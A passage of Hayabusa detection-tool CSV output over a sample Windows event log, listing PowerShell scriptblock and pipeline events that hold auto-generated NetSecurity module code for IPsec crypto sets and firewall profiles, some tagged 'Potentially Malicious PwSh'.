'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.661 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.661 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.662 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.662 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.662 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.663 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.663 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.664 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 